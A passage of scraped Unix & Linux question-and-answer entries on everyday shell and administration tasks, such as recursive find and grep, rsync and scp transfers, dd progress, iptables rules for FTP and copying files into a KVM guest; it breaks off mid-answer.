&& #this is logical AND. This is used so: X && Y, meaning if X computes to true, then compute Y. So for this function, the meaning is: if $i less or equals 2, do the following:
echo $i #this follows the logical && above, so is computed conditionally. Namely, print $i.
|| #this is logical OR, so what follows is computed only if what's on the left boils down to false.
#Here the meaning is, IF NOT $i -le 2 AND echo... (which doesn't matter), do what's on the right. So do what's in the {} braces, if $i is greater than 2.
And now this is left:
{ f=$(( i - 1)); f=$(factorial $f); f=$(( f * i )); echo $f; }
The braces {} make what's in them a block, which is treated as an entity. To explain it appearing here most simply, the logic introduced before with && and || now applies to the whole block. Now to the parts.
f=$(( i - 1));
$(( )) is an arithmetic operator. f= you should know by now. The whole expression means assign to f the value of i - 1.
Notice how the parts of a block are ended with a semicolon ;.
f=$(factorial $f);
The above calls the function. This is the place of recursion. Literal meaning: assign to f the return value of the function factorial called with the $f as an argument. (Assignment doesn't require the $, as you may have noticed.) The $( ) is a command substitution. You can call a function by simply calling its name, but for a variable value assignment, the value has to be passed somehow, and that's how it's done here.
f=$(( f * i ));
Above you see the arithmetic operator again, i.e. $(( )). Here f gets the value of f, which by now is equal to $(factorial $f), multiplied by i, which is equal to the $1 argument of the function.
And finally, print the value of f:
echo $f;
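Putting the pieces together, here is a minimal self-contained copy of the function from the question with a sample call (the declare -i lines are dropped as a simplification, since the $(( )) arithmetic already treats the values as integers):

```shell
# Recursive factorial, as explained above.
factorial() {
    local i=$1 f
    # base case: i <= 2 prints i; otherwise recurse on i - 1 and multiply
    [ "$i" -le 2 ] && echo "$i" || { f=$(( i - 1 )); f=$(factorial "$f"); f=$(( f * i )); echo "$f"; }
}

factorial 5   # prints 120
```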
| explain recursion syntax |
1,425,972,805,000 |
I'm attempting to get a list of all files under specific folders, recursively, with the "find" command.
find / -path "/usr/sbin/*" -o -path "/usr/bin/*" -o -path "/usr/local/sbin/*" -o -path "/usr/local/bin/*" -o -path "/sbin/*" -o -path "/bin/*" -o -path "*/etc/*"
The previous command, doesn't list the contents of /sbin and /bin , even though they do have content.
Any ideas of how to get there?
|
/sbin is a symlink to /usr/sbin and /bin is a symlink to /usr/bin.
ls -ld /bin /sbin will show you this.
| "find" doesn't list all files under specific directories |
1,425,972,805,000 |
I have written the following script:
#!/bin/bash
if [ $# -eq 0 ]
then
read current_dir
else
current_dir=$1
fi
function print_tree_representation ()
{
for file in `ls -A $1`
do
local times_p=$2
while [ $times_p -gt 0 ]
do
echo -n "----"
times_p=$(( $times_p - 1 ))
done
echo $file
if test -d $file
then
local new_path=$1/$file
local new_depth=$(( $2 + 1 ))
print_tree_representation $new_path $new_depth
fi
done
}
print_tree_representation $current_dir 0
for printing the tree-like structure of the directory passed as an argument. However, it doesn't go beyond the second level of depth. I can't figure out what is wrong.
|
The problem is with this line:
if test -d $file
The $file you have extracted from ls -A doesn't contain the full path. You can fix it by replacing that line with
if test -d "$1/$file"
There's another bug: the script will break all over the place if a filename contains spaces, because the unquoted output of ls is word-split in the for loop and the variables are expanded unquoted. Put all filename expansions in quotes (and avoid parsing ls output in the first place).
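A sketch of the script with both fixes applied: a glob replaces ls (so names with spaces survive), every expansion is quoted, and the -d test uses the full path. Note one behavioural difference: unlike ls -A, the plain glob skips hidden files.

```shell
#!/bin/bash
print_tree_representation() {
    local file times_p
    for file in "$1"/*; do
        [ -e "$file" ] || continue            # empty directory: glob didn't match
        times_p=$2
        while [ "$times_p" -gt 0 ]; do
            printf '%s' '----'
            times_p=$(( times_p - 1 ))
        done
        printf '%s\n' "${file##*/}"           # name only, without the path
        if [ -d "$file" ]; then
            print_tree_representation "$file" $(( $2 + 1 ))
        fi
    done
}

print_tree_representation "${1:-.}" 0
```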
| Bug in shell script for printing the tree-like structure of the current directory
1,425,972,805,000 |
I use grep -r all the time to find occurrences of a string within files in a given directory:
$ grep -r "string" app/assets/javascripts
> app/assets/javascripts/my_file.js: this line contains my string
But what if I want to recursively search through more than one subdirectory of my current directory? The only way I can think of is to run grep twice:
$ grep -r "string" app/assets/javascripts
> app/assets/javascripts/my_file.js: this line contains "string"
$ grep -r "string" spec/javascripts
> app/assets/javascripts/my_file.js: "string" appears here, too.
How can I combine the above two grep commands into a single line? I don't want to search through every single file in ., and --exclude-dir isn't practical because there are too many other directories under . for me to explicitly exclude them all.
Is this possible?
|
You can specify multiple directories in grep:
grep -r "string" app/assets/javascripts spec/javascripts
Alternatively (sometimes more useful), you can list the files to grep with find, and then grep them, for example:
find app/assets/javascripts spec/javascripts -type f -print0 |
xargs -0 grep "string"
or
find app/assets/javascripts spec/javascripts -type f -exec grep -H "string" {} +
| How can I recursively grep through several directories at once? |
1,425,972,805,000 |
With this command
find . -name '*.zip' -exec unzip '{}' ';'
we find all zip files under . (directory), then unzip them into the current working directory,
However, the structure is gone.
/backUp/pic1/1-1.zip
/backUp/pic1/1-2.zip
/backUp/pic2/2-1.zip
/backUp/pic2/2-2.zip
/backUp/pic3/3-1.zip
/backUp/pic3/3-2.zip
/backUp/pic3/3-3.zip
Current command result:
/new/1-1
/new/1-2
/new/2-1
/new/2-2
/new/3-1
/new/3-2
/new/3-3
desired result
/new/pic1/1-1
/new/pic1/1-2
/new/pic2/2-1
/new/pic2/2-2
/new/pic3/3-1
/new/pic3/3-2
/new/pic3/3-3
Asked here, but the code doesn't work out
What should dirname and basename be in this command?
|
You can use find with the -execdir argument instead of -exec.
-execdir will run the command in the directory it has found the files in, instead of your current working directory
Example:
find . -name '*.zip' -execdir unzip {} \;
While this is not exactly what you've asked for, you could add a few steps to get to the desired result:
mkdir new
cp -a backUp/* new/
#run unzip operation
cd new
find . -name '*.zip' -execdir unzip {} \;
#remove all .zip files
find . -name '*.zip' -exec rm {} \;
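A one-pass alternative (an untested sketch, assuming the originals live under backUp and should stay there, and that each zip sits at least one directory deep, as in the question): derive each zip's mirrored directory under new/ and unzip straight into it, without copying the archives first.

```shell
# For each zip, strip the leading "backUp/" to get its relative path,
# recreate that path's parent directory under new/, and extract there.
find backUp -type f -name '*.zip' | while IFS= read -r zip; do
    rel=${zip#backUp/}                 # e.g. pic1/1-1.zip
    mkdir -p "new/${rel%/*}"           # e.g. new/pic1
    unzip -q "$zip" -d "new/${rel%/*}"
done
```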
| For all zips, unzip into the working directory and maintain the structure
1,425,972,805,000 |
Let's suppose I have the following timestamp like directory tree:
root
|__ parent1
| |__ 2021
| | |__ 01
| | | |__ 22
| | | | |__ 12H
| | | | | |__ file1
| | | | | |__ file2
| | | | |__ 13H
| | | | | |__ file1
| | | | | |__ file2
| | | |__ 23
| | | | |__ 12H
| | | | | |__ file1
| | | | | |__ file2
| | | | |__ 13H
| | | | | |__ file1
| | | | | |__ file2
|__ parent2
| |__ etc
What I would like is to recursively navigate through this folder structure so that, for each folder parent1, parent2, etc., it would display the most recent timestamp found, along with a count of the files contained.
For example, something like:
PARENT | LAST_TIMESTAMP | COUNT |
--------------------------------------------
parent1 | 2021-01-23T13:00:00 | 2 |
parent2 | 2022-01-01T00:00:00 | 5 | (dummy example)
... ... ...
I have seen other answers but all of them take into account just the modification date of the files in all the folders, while in this case it would have to do with the name of the folders only.
|
Using find and a perl one-liner:
This uses a tab to separate the timestamp and the filename, and NUL to separate each record - so it will work with any filenames, including those containing newlines.
find .. -type f -printf '%T@\t%p\0' |
perl -MDate::Format -0ne '
($t,$f) = split /\t/,$_,2;
(undef,$p) = split "/", $f;
$T{$p} = $t if ($t > $T{$p});
$count{$p}++;
END {
my $fmt = "%-20s | %-19s | %5s |\n";
printf "$fmt", "PARENT", "LAST_TIMESTAMP", "COUNT";
print "-" x 52, "\n";
foreach (sort keys %T) {
printf $fmt, $_, time2str("%Y-%m-%dT%H:%M:%S",$T{$_}), $count{$_}
}
}'
It produces output like:
PARENT | LAST_TIMESTAMP | COUNT |
---------------------|---------------------|-------|
foo | 2021-07-16T22:54:22 | 4 |
bar | 2021-06-29T12:25:06 | 13 |
baz | 2021-07-14T14:31:43 | 5 |
quux | 2021-07-16T19:46:21 | 7 |
Alternatively, if you use perl's File::Find module you won't need to pipe find's output into it:
#!/usr/bin/perl
use strict;
use Date::Format;
use File::Find;
my %T; # hash containing newest timestamp for each top-level dir
my %count; # count of files in each top-level dir
find(\&wanted, @ARGV);
my $fmt = "| %-20s | %-19s | %5s |\n";
my $hfmt = "|-%-20s-|-%-19s-|-%5s-|\n";
#print "-" x 54, "\n";
printf "$fmt", "PARENT", "LAST_TIMESTAMP", "COUNT";
printf $hfmt, "-" x 20, "-" x 19, "-" x 5;
foreach (sort keys %T) {
printf $fmt, $_, time2str("%Y-%m-%dT%H:%M:%S", $T{$_}), $count{$_}
}
#print "-" x 54, "\n";
sub wanted {
return unless -f $File::Find::name;
# uncomment only one of the following statements:
# get the mod time of the file itself
my $t = (stat($File::Find::name))[9];
# get the mod time of the directory it's in
#my $t = (stat($File::Find::dir))[9];
my $p = $File::Find::dir;
$p =~ s:^\.*/::;
$T{$p} = $t if ($t > $T{$p});
$count{$p}++;
};
Save this as, e.g. find-latest.pl, make executable with chmod +x find-latest.pl and give it one or more directories as arguments when you run it:
$ ./find-latest.pl ../
| PARENT | LAST_TIMESTAMP | COUNT |
|----------------------|---------------------|-------|
| foo | 2021-07-16T22:54:22 | 4 |
| bar | 2021-06-29T12:25:06 | 13 |
| baz | 2021-07-14T14:31:43 | 5 |
| quux | 2021-07-16T19:46:21 | 7 |
This requires the perl Date::Format
module. On debian, you can install it with apt-get install libtimedate-perl. It should be packaged for other distros too, otherwise
install with cpan.
Alternatively, you can use the strftime() function from the POSIX module,
which is a core module, and is included with perl.
File::Find is also a core perl module, included with perl.
| Recursively traverse directories and retrieve last timestamp file |
1,425,972,805,000 |
Just out of curiosity, is it possible to delete the contents of a directory which is mounted inside of itself OR in a folder inside it?
For example, I was taking a backup of my Arch installation with Timeshift. I saw that Timeshift mounts / at /run/timeshift/backup/ temporarily. In this case, can I delete contents in my / mounted in this mount point? Or, will it not allow me to delete it's contents recursively?
|
I just tried what you described on Debian inside my user directory. I made a directory test and another directory inside it, test/mnt. Then I added some test/content and mounted test to test/mnt like this:
$ sudo mount --bind /home/user/test/ /home/user/test/mnt/
Now, if I delete it like this:
$ rm -r test/*
Or like this:
$ rm -r test/mnt/*
I get all the content deleted, but the /home/user/test/mnt/ is not deleted because it is busy. Issuing the command under root has the same result.
So, it will allow you to delete the contents, except the mount point itself, unless it runs into another error before that.
| Is it possible to delete contents of a directory mounted inside itself? |
1,425,972,805,000 |
I wrote a simple script to delete useless files from a directory using the find command.
Now I'm wondering if I can add lines to the script to flatten directories, but not completely flatten them.
e.g.,
If I have a big directory named cleantarget:
cleantarget
Folder A
Folder A1
Folder A2
Folder B
Folder B1
Folder B11
I want the end result to be:
cleantarget
Folder A
Folder B
I do NOT want the result to be:
cleantarget
all my files
There are 16000 files in this directory, so it'd be nice to do this with a script, so I can run it occasionally when the directory gets messed up again.
How do I do this?
EDIT: In essence, this means: I want a script, that will separately flatten each sub-directory within a given target directory. i.e., flatten Folder A, flatten Folder B, and flatten Folder C, and so on until all directories within cleanfolder are flattened.
|
These lines should work:
find "/path/to/cleantarget" -maxdepth 1 -mindepth 1 -type d | while read line; do
find "${line}" -mindepth 2 -type f -exec mv -t "${line}" -i '{}' +
rm -r "${line}"/*/
done
This will flatten Folder A and Folder B, asking if you want to overwrite duplicates, and remove the folders afterwards.
Source: https://unix.stackexchange.com/a/52816/284212
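A variant of the same loop wrapped in a function, using -print0 / read -d '' so that directory names containing spaces (or even newlines) survive. It assumes GNU find and mv, as the original does for mv -t.

```shell
# Flatten each immediate subdirectory of the target directory in turn.
flatten_subdirs() {
    local target=$1 dir
    find "$target" -maxdepth 1 -mindepth 1 -type d -print0 |
    while IFS= read -r -d '' dir; do
        # Pull every file from deeper levels up into $dir,
        # then drop the now file-less subdirectories.
        find "$dir" -mindepth 2 -type f -exec mv -t "$dir" -i '{}' +
        rm -r "$dir"/*/ 2>/dev/null
    done
}

# flatten_subdirs /path/to/cleantarget
```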
| How do I write a shell script to flatten directories? |
1,425,972,805,000 |
I want to change the ACL and the default ACL for all directories and files in a base directory. In other answers (such as this one), the -R flag is used. However, I get
$ setfacl -R -m u::rwx my_dir/
setfacl: unknown option -- R
Try `setfacl --help' for more information.
# this is different from what's done on, e.g. Ubuntu
# setfacl -R -d -m u::rwx mydir/
$ setfacl -R -m d:u::rwx mydir/
How can I recursively set the ACL permissions on Cygwin?
|
To repeat the command for any file and directory contained in a directory you can use find and its -exec option
find my_dir -exec setfacl -m u::rwx {} \;
| setfacl -R doesn't work on Cygwin |
1,425,972,805,000 |
I have been trying to download specific pages in website.
The site uses common URL to go to next pages like below.
https://example.com/pages/?p=1
https://example.com/pages/?p=2
https://example.com/pages/?p=3 upto 450.
I just want to download those pages and not the hyperlinks linked within them (meaning not the child pages, just the parent pages, e.g. ?p=1, ?p=2, etc.).
I have tried the below command, but it is not working.
wget --load-cookies=cookies.txt https://example.com/pages/\?p\=\{1..450\}
Does that mean {..} will not work in wget? If not, are there any options in wget that I can use to achieve my goal?
|
Using a shell that understand arithmetic ranges in brace expansions (e.g. bash and ksh93 and zsh):
wget --load-cookies=cookies.txt "https://example.com/pages/?p="{1..450}
This would be expanded (before wget is called) to
wget --load-cookies=cookies.txt "https://example.com/pages/?p="1 "https://example.com/pages/?p="2 "https://example.com/pages/?p="3 ... "https://example.com/pages/?p="450
With curl:
curl --cookie cookies.txt "https://example.com/pages/?p="{1..450}
Saving the output into individual files, using curl's built-in URL globbing and the #1 output placeholder:
curl --cookie cookies.txt -o 'outfile#1.html' "https://example.com/pages/?p=[1-450]"
| wget only parent pages using {..} |
1,425,972,805,000 |
I'm running this command to find all the files named deploy.php in my whole project and make a copy of them and place them in the same directory as they were found, with name deploy_bkp.php
find . -type f -name "deploy.php" -exec cp {} deploy_bkp.php \;
But it's not working recursively; it's only working for files in the top directory.
|
According to https://askubuntu.com/questions/497122/find-and-exec-in-found-folder you should use -execdir
Your command should look like this:
find . -type f -name "deploy.php" -execdir cp {} deploy_bkp.php \;
| find and copy exec command not recursive [duplicate] |
1,302,715,144,000 |
I've not used dd all that much, but so far it's not failed me yet. Right now, I've had a dd going for over 12 hours - I'm writing an image back to the disk it came from - and I'm getting a little worried, as I was able to dd from the disk to the image in about 7 hours.
I'm running OSX 10.6.6 on a MacBook with a Core 2 Duo at 2.1ghz/core with 4gb RAM. I'm reading from a .dmg on a 7200rpm hard drive (the boot drive), and I'm writing to a 7200rpm drive connected over a SATA-to-USB connector. I left the blocksize at default, and the image is about 160gb.
EDIT: And, after 14 hours of pure stress, the dd worked perfectly after all. Next time, though, I'm going to run it through pv and track it with strace. Thanks to everyone for all your help.
|
You can send dd a certain signal using the kill command to make it output its current status. The signal is INFO on BSD systems (including OSX) and USR1 on Linux. In your case:
kill -INFO $PID
You can find the process id ($PID above) with the ps command; or see pgrep and pkill alternatives on mac os x for more convenient methods.
More simply, as AntoineG points out in his answer, you can type ctrl-T at the shell running dd to send it the INFO signal.
As an example on Linux, you could make all active dd processes output status like this:
pkill -USR1 -x dd
After outputting its status, dd will continue copying.
| How do I know if dd is still working? |
1,302,715,144,000 |
I always use either rsync or scp in order to copy files from/to a remote machine. Recently, I discovered in the manual of scp (man scp) the flag -C
-C Compression enable. Passes the -C flag to
ssh(1) to enable compression.
Before I discovered this flag, I used to zip before and then scp.
Is it as efficient to just use -C as it is to zip and unzip? When does using one or the other make the transfer faster?
|
It's never really going to make any big difference, but zipping the file before copying it ought to be slightly less efficient: a container format such as zip, which can encapsulate multiple files (like tar), is unnecessary here, and zip input and output cannot be streamed, so you need a temporary file.
Using gzip on the other hand, instead of zip ought to be exactly the same since it's what ssh -C does under the hood... except that gzipping yourself is more work than just using ssh -C.
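The streaming point is easy to see: gzip reads stdin and writes stdout, so it needs no temporary file, which zip's container format cannot do.

```shell
# gzip compresses and decompresses through a pipe, no intermediate file:
printf 'hello\n' | gzip -c | gunzip -c    # prints: hello
```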
| What does the `-C` flag exactly do in `scp`? |
1,302,715,144,000 |
I was wondering if there is a way to use Samba to send items to a client machine via the command line (I need to send the files from the Samba server). I know I could always use scp but first I was wondering if there is a way to do it with Samba. Thanks!
|
Use smbclient, a program that comes with Samba:
$ smbclient //server/share -c 'cd c:/remote/path ; put local-file'
There are many flags, such as -U to allow the remote user name to be different from the local one.
On systems that split Samba into multiple binary packages, you may have the Samba servers installed yet still be missing smbclient. In such a case, check your package repository for a package named smbclient, samba-client, or similar.
| Sending files over Samba with command line |
1,302,715,144,000 |
I want to allow incoming FTP traffic.
CentOS 5.4:
This is my /etc/sysconfig/iptables file.
# Generated by iptables-save v1.3.5 on Thu Oct 3 21:23:07 2013
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [133:14837]
-A INPUT -p tcp -m tcp --dport 21 -j ACCEPT
-A INPUT -p tcp -m state --state ESTABLISHED -j ACCEPT
-A INPUT -j REJECT --reject-with icmp-port-unreachable
-A OUTPUT -p tcp -m tcp --sport 20 -j ACCEPT
COMMIT
# Completed on Thu Oct 3 21:23:07 2013
Also, by default, ip_conntrack_netbios_n module is getting loaded.
#service iptables restart
Flushing firewall rules: [ OK ]
Setting chains to policy ACCEPT: filter [ OK ]
Unloading iptables modules: [ OK ]
Applying iptables firewall rules: [ OK ]
Loading additional iptables modules: ip_conntrack_netbios_n[ OK ]
But the problem is not with that module, as I tried unloading it and still no luck.
If I disable iptables, I am able to transfer my backup from another machine to FTP.
If iptables is enforcing, the transfer fails.
|
Adding NEW fixed it, I believe.
Now, my iptables file look like this..
# Generated by iptables-save v1.3.5 on Thu Oct 3 22:25:54 2013
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [824:72492]
-A INPUT -p tcp -m tcp --dport 21 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 20 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --sport 1024:65535 --dport 20:65535 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m state --state ESTABLISHED -j ACCEPT
-A INPUT -j REJECT --reject-with icmp-port-unreachable
-A OUTPUT -p tcp -m tcp --dport 21 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 20 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 1024:65535 --dport 20:65535 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
COMMIT
# Completed on Thu Oct 3 22:25:54 2013
Posting this as an answer, since comments don't allow this many characters. Thank you so much for your help.
| Iptables to allow incoming FTP |
1,302,715,144,000 |
scp works well in all cases, but the Raspberry Pi is too weak to copy files efficiently in a secure environment (LAN). The theoretically possible 6.75 MB/s via 54 Mbit wireless LAN shrinks down to about 1.1 MB/s.
Is there a way to copy files remotely without encryption?
It should be a CLI command with no dependencies on extra services (ftp, samba), or at least with a minimum of configuration. I mean a standard tool that works quite well out-of-the-box with standard programs/services (like scp/ssh).
|
You might be looking for rcp. It performs remote execution via rsh, so you will have to rely on that, and keep in mind that all communication is insecure.
| Copy files without encryption (ssh) in local network |
1,302,715,144,000 |
In a case I can use only UDP and ICMP protocols, how can I discover, in bytes, the path MTU for packet transfer from my computer to a destination IP?
|
I believe what you are looking for is most easily gotten via traceroute --mtu <target>, maybe with a -6 switch thrown in for good measure, depending on your interests.
Linux traceroute uses UDP by default; if you believe your luck is better with ICMP, try also -I.
| Discover MTU between me and destination IP |
1,302,715,144,000 |
I have a home file server that I use Ubuntu on.
Recently, one of my drives filled up so I got another and threw it in there.
I have a very large folder, the directory is about 1.7 T in size and contains a decent amount of files.
I used GCP to COPY the files from the old drive to the new one and it seems to have worked fine.
I want to now validate the new directory on the new drive against the original directory on the old drive before I delete the data from the old drive to free up space. I understand that I can do a CRC check to do this.
How, specifically, can I do this?
|
I’d simply use the diff command:
diff -rq --no-dereference /path/to/old/drive/ /path/to/new/drive/
This reads and compares every file in the directory trees and reports any differences. The -r flag compares the directories recursively while the -q flag just prints a message to screen when files differ – as opposed to printing the actual differences (as it does for text files). The --no-dereference flag may be useful if there are symbolic links that differ, e.g., in one directory, a symbolic link, and in its corresponding directory, a copy of the file that was linked to.
If the diff command prints no output, that means the directory trees are indeed identical; you can run echo $? to verify that its exit status is 0, indicating that both sets of files are the same.
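A minimal illustration of that exit-status check, on two throwaway trees:

```shell
# Two identical trees: diff -rq prints nothing and exits 0.
mkdir -p /tmp/old /tmp/new
echo same > /tmp/old/file && cp /tmp/old/file /tmp/new/file
diff -rq /tmp/old /tmp/new && echo "trees are identical"
```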
I don’t think computing CRCs or checksums is particularly beneficial in this case. It would make more sense if the two sets of files were on different systems and each system could compute the checksums for their own set of files so only the checksums need to be sent over the network. Another common reason for computing checksums is to keep a copy of the checksums for future use.
| Verifying a large directory after copy from one hard drive to another |
1,302,715,144,000 |
Here is the situation:
I am uploading a large file from client A to a server using sftp.
I also need to download this file from the server to client B over ssh.
What I would like to do is start the transfer from the server to client B when the upload is still happening from client A.
What is the best method/tool to get this done?
UPDATE:
The answers so far are interesting--I'll be sure to read and test them all. Bonus points for answers that don't depend on controlling how Client A is uploading the file. (ie. the only thing we know from client A is that the file is being written to a known filename.)
|
For a single file, instead of using SFTP you could pipe the file over ssh, using cat or pv at the sending side and tee on the middle server to both write the data to a file there and send a copy over another ssh link, the other side of which just writes the data to a file. The exact voodoo required I'll leave as an exercise for the reader, as I've not got time to play right now (sorry). This method would only work if the second destination is publicly accessible via SSH, which may not be the case as you describe it as a client machine.
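The moving part in that pipeline is tee, which writes its stdin to a file while passing it through unchanged. Here is a local stand-in for the server hop; the real version wraps each end in ssh (hostnames and paths hypothetical).

```shell
# Local analogue: "server_copy" is the file tee writes on the middle
# server; the final redirect stands in for the second ssh hop to client B.
printf 'payload\n' | tee /tmp/server_copy | cat > /tmp/clientB_copy

# The ssh-wrapped shape would be roughly:
#   cat bigfile | ssh server 'tee /srv/bigfile | ssh clientB "cat > bigfile"'
```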
Another approach, which is less "run and wait" but may otherwise be easier, is to use rsync between the server and client B. The first time you run this it may get a partial copy of the data, but you can just re-run it to get more data afterwards (with one final run once the Client1->Server transfer is complete). This will only work if the server puts the data directly into the right file-name during the SFTP transfer (sometimes you will see the data going into a temporary file which is then renamed once the file is completely transferred - this is done to make the file update more atomic, but will render the rsync idea unusable). You could also use rsync for the C1->S transfer instead of scp (if you use the --inplace option to avoid the problem mentioned above) - using rsync would also give you protection against needing to resend everything if the C1->Server connection experiences problems during a large transfer (I tend to use rsync --inplace -a --progress <source> <dest> instead of scp/sftp when rsync is available, for this "transfer resume" behaviour).
To summarise the above, running:
rsync --inplace -a --progress <source> user@server:/<destination_file_or_folder>
on client1 then running
rsync --inplace -a --progress user@server:/<destination_file_or_folder> <destination_on_cli2>
on client2 repeatedly until the first transfer is complete (then running once more to make sure you've got everything). rsync is very good at only transferring the absolute minimum it needs to update a location instead of transferring the whole lot each time. For paranoia you might want to add the --checksum option to the rsync commands (which will take much more CPU time for large files but won't result in significantly more data being transfered unless it is needed) and for speed the --compress option will help if the data you are transferring is not already in a compressed format.
| How to copy a file that is still being written over ssh? |
1,302,715,144,000 |
I have two servers. One of them has 15 million text files (about 40 GB). I am trying to transfer them to another server. I considered zipping them and transferring the archive, but I realized that this is not a good idea.
So I used the following command:
scp -r usrname@ip-address:/var/www/html/txt /var/www/html/txt
But I noticed that this command just transfers about 50,000 files and then the connection is lost.
Is there any better solution that allows me to transfer the entire collection of files? I mean something like rsync, which can transfer the files that didn't make it before the connection was lost. If the connection were interrupted again, I would simply run the command again, and it would skip the files that had already been transferred successfully.
This is not possible with scp, because it always begins from the first file.
|
As you say, use rsync:
rsync -azP /var/www/html/txt/ username@ip-address:/var/www/html/txt
The options are:
-a : enables archive mode, which preserves symbolic links and works recursively
-z : compress the data transfer to minimise network usage
-P : to display a progress bar and enables you to resume partial transfers
As @aim says in his answer, make sure you have a trailing / on the source directory (on both is fine too).
More info from the man page
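The same flags work for a local copy, which makes a safe dry run before pointing the command at the remote host (assuming rsync is installed):

```shell
mkdir -p /tmp/rsdemo/src
echo hello > /tmp/rsdemo/src/file.txt
# The trailing slash on src/ copies its contents, not the directory itself.
rsync -azP /tmp/rsdemo/src/ /tmp/rsdemo/dst/
```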
| Transferring millions of files from one server to another |
1,302,715,144,000 |
I'd like to copy squid.conf from one server to another.
The servers don't talk to each other. I'd like to go through my workstation.
Both servers have the file, so it will be overwritten on the target.
The files have 600 permission and are owned by root.
root login via ssh is disabled (PermitRootLogin no).
I'd like to do it in one line, if possible, since it will be a part of a setup guide.
I know to do
ssh source 'tar czpf - -C /etc/squid/ squid.conf' | \
ssh target 'tar xzpf - -C /etc/squid/'
to copy files between servers and preserve permissions. However, in this case I will get "Permission denied".
I also know I can do this:
ssh -t source 'sudo cat /etc/squid/squid.conf'
This way the -t allows sudo to ask for the admin password before outputing the content of the file.
The problem is, I don't know how to combine those techniques into something that will ask for the sudo password on each server, and transfer the file to its destination. Is this possible?
UPDATE: Here's the best I could come up with:
ssh -t source 'sudo tar czf /tmp/squid.tgz -C /etc/squid squid.conf' && \
ssh source 'cat /tmp/squid.tgz' | \
ssh target 'cat >/tmp/squid.tgz' && \
ssh -t source 'sudo rm /tmp/squid.tgz' && \
ssh -t target \
'sudo tar xzf /tmp/squid.tgz -C /etc/squid && sudo rm /tmp/squid.tgz'
Calling this a one-liner seems like a stretch. I think I'll just break it down to separate steps in the setup guide.
|
It's easier to chain ssh with ssh than to chain ssh with sudo. If changing the ssh server configuration is OK, I suggest opening up ssh for root on each server, but only from localhost. You can do this with a Match clause in sshd_config:
PermitRootLogin no
Match Host localhost
PermitRootLogin yes
Then you can set up a key-based authentication chain from remote user to local user and from local user to root. You still have an authentication trail so your logs tell you who logged in as root, and the authentication steps are the same as if sudo was involved.
To connect to a server as root, define an alias in ~/.ssh/config like this:
Host server-root
HostName server.example.com
User root
ProxyCommand "ssh server.example.com nc %h %p"
If you insist on using sudo, I believe you'll need separate commands, as sudo insists on reading from a terminal (even if it has a ticket for your account)¹, and none of the usual file copying methods (scp, sftp, rsync) support interacting with a remote terminal.
Sticking with ssh and sudo, your proposed commands can be simplified. On each side, if sudo is set up not to ask for a password again within its timeout, you can run it once to get the password prompt out of the way, then a second time to copy the file. (You can't easily copy the file directly because the password prompt gets in the way.) Note that -t is only needed for the interactive password prompts; leaving it off the piped commands avoids a pseudo-terminal mangling the file's line endings in transit.
ssh -t source 'sudo true'
ssh -t target 'sudo true'
ssh source 'sudo cat /etc/squid/squid.conf' |
ssh target 'sudo tee /etc/squid/squid.conf >/dev/null'
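Stripped of ssh, the cat-to-tee step is just a byte pipe. A local stand-in (purely illustrative, with /tmp directories playing the two hosts) shows the data path:

```shell
#!/bin/sh
# Local sketch of the copy pipeline: 'cat' on the "source" side feeds
# 'tee' on the "target" side, which writes the file out.
mkdir -p /tmp/src /tmp/dst
printf 'http_port 3128\n' > /tmp/src/squid.conf   # stand-in config file
cat /tmp/src/squid.conf | tee /tmp/dst/squid.conf > /dev/null
# Verify the copy is byte-identical
cmp -s /tmp/src/squid.conf /tmp/dst/squid.conf && echo copied intact
```

In the real commands, each end of the pipe is simply wrapped in an ssh invocation and run under sudo.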
¹ unless you have NOPASSWD, but then you wouldn't be asking this.
| Copying protected files between servers in one line? |
1,302,715,144,000 |
I need to upload a directory with a rather complicated tree (lots of subdirectories, etc.) by FTP. I am unable to compress this directory, since I do not have any access to the destination apart from FTP - e.g. no tar. Since this is over a very long distance (USA => Australia), latency is quite high.
Following the advice in How to FTP multiple folders to another server using mput in Unix?, I am currently using ncftp to perform the transfer with mput -r. Unfortunately, this seems to transfer a single file at a time, wasting a lot of the available bandwidth on communication overhead.
Is there any way I can parallelise this process, i.e. upload multiple files from this directory at the same time? Of course, I could manually split it and execute mput -r on each chunk, but that's a tedious process.
A CLI method is heavily preferred, as the client machine is actually a headless server accessed via SSH.
|
lftp can do this with the command mirror -R -P 20 localpath: mirror syncs between locations, -R reverses the direction so the remote server is the destination (i.e. an upload), and -P 20 runs 20 parallel transfers at once.
As explained in man lftp:
mirror [OPTS] [source [target]]
Mirror specified source directory to local target directory. If target
directory ends with a slash, the source base name is appended to target
directory name. Source and/or target can be URLs pointing to directories.
-R, --reverse reverse mirror (put files)
-P, --parallel[=N] download N files in parallel
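Spelled out as a single invocation (the server name, credentials, and paths here are placeholders for your own):

```shell
lftp -u user,password -e 'mirror -R -P 20 /local/project /remote/project; quit' ftp.example.com
```

The -e option runs the given commands after connecting; the trailing quit exits lftp once the mirror finishes, which makes it usable from a headless SSH session or a cron job.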
| How can I parallelise the upload of a directory by FTP? |
1,302,715,144,000 |
I have to make a configuration file available to a guest OS running on top of the KVM hypervisor.
I have already read about folder-sharing options between host and guest in KVM with qemu and 9p virtio support. I would like to know about a simple procedure for a one-time file transfer from host to guest.
Please let me know how to transfer a file while the guest OS is running, as well as a possible way to make the file available to the guest OS by the time it starts running (e.g. by packaging the file into the disk image, if possible).
The host OS will be Linux.
|
Just hit upon two different ways:
Transfer files via the network. For example, you can run httpd on the host and use any web browser or wget/curl to download files. Probably the easiest and handiest.
Build ISO image on the host with files you want to transfer. Then attach it to the guest's CD drive.
genisoimage -o image.iso -r /path/to/dir
virsh attach-disk guest image.iso hdc --driver file --type cdrom --mode readonly
You can use mkisofs instead of genisoimage.
You can use GUI like virt-manager instead of virsh CUI to attach an ISO image to the guest.
You need to create the VM beforehand and supply that VM's name or ID as guest. You can list existing VMs with virsh list --all.
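The first (network) method can be as simple as a throwaway web server. In this sketch the served directory, file name, and port are placeholders, and the 192.168.122.1 address assumes libvirt's default NAT network:

```shell
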